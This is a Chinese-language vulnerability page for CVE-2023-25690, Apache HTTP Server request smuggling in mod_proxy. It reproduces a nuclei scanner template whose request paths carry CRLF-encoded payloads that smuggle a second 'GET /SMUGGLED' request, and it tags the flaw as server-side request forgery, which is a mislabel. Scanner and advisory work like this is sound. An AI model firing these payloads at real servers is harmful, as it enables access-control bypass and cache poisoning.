Apache HTTP Server HTTP Request Smuggling Vulnerability

漏洞信息

漏洞名称: Apache HTTP Server HTTP Request Smuggling Vulnerability

漏洞编号:

  • CVE: CVE-2023-25690

漏洞类型: 服务器端请求伪造

漏洞等级: 严重

漏洞描述: Apache HTTP Server是一款广泛使用的开源Web服务器软件,支持多种操作系统,常用于搭建网站和应用服务。其模块化设计允许通过加载不同模块来扩展功能,适用于各种规模的网络环境。该漏洞存在于Apache HTTP Server的2.4.0至2.4.55版本中,涉及mod_proxy模块的配置问题。具体来说,当使用RewriteRule或ProxyPassMatch指令时,如果配置不当,攻击者可以利用HTTP请求走私(HTTP Request Smuggling)技术,绕过访问控制,代理非预期的URL,以及污染缓存。这种攻击需要特定的配置条件,即变量替换的使用。漏洞的根本原因在于对用户提供的URL数据的不当处理,导致在重新插入到代理请求时,可以被恶意利用。此漏洞的严重性在于它允许攻击者远程执行未经授权的操作,可能导致数据泄露、服务中断或其他安全风险。由于攻击不需要用户交互,且可以自动化执行,因此对受影响系统的威胁较大。建议用户立即升级到Apache HTTP Server 2.4.56或更高版本以修复此漏洞。

产品厂商: apache

产品名称: http_server

影响版本: 2.4.0 <= version <= 2.4.55

搜索语法: cpe:”cpe:2.3:a:apache:http_server”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/ea459166605e7e6317286d1979492844e9c730f0/http%2Fcves%2F2023%2FCVE-2023-25690.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

id: CVE-2023-25690

info:
  name: Apache HTTP Server - HTTP Request Smuggling
  author: pszyszkowski
  severity: critical
  description: |
    Apache HTTP Server versions 2.4.0 through 2.4.55 contain a HTTP Request Smuggling caused by vulnerable mod_proxy configurations with RewriteRule or ProxyPassMatch that match user-supplied URL data and re-insert it into proxied requests, letting attackers bypass access controls, proxy unintended URLs, and poison caches, exploit requires specific configuration with variable substitution.
  remediation: |
    Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.
  reference:
    - https://github.com/oOCyginXOo/CVE-2023-25690-POC
    - https://nvd.nist.gov/vuln/detail/cve-2023-25690
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-25690
    cwe-id: CWE-444
    cpe: cpe:2.3:a:apache:http_server
  metadata:
    verified: true
    max-request: 3
    vendor: apache
    product: http_server
    shodan-query:
      - cpe:"cpe:2.3:a:apache:http_server"
  tags: cve2023,cve,apache,smuggling

http:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}} HTTP/1.1%0a%0aHost:%20localhost%0d%0a%0d%0aGET /SMUGGLED HTTP/1.1"
      - "{{BaseURL}} HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET /SMUGGLED HTTP/1.1"

    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200"
          - "status_code_2==400"
          - "status_code_3==200"
        condition: and

Github Poc
#projectdiscovery/nuclei-templates:github issues #服务器端请求伪造
Apache HTTP Server HTTP Request Smuggling Vulnerability
http://example.com/2025/07/29/github_1562422880/
作者
lianccc
发布于
2025年7月29日
许可协议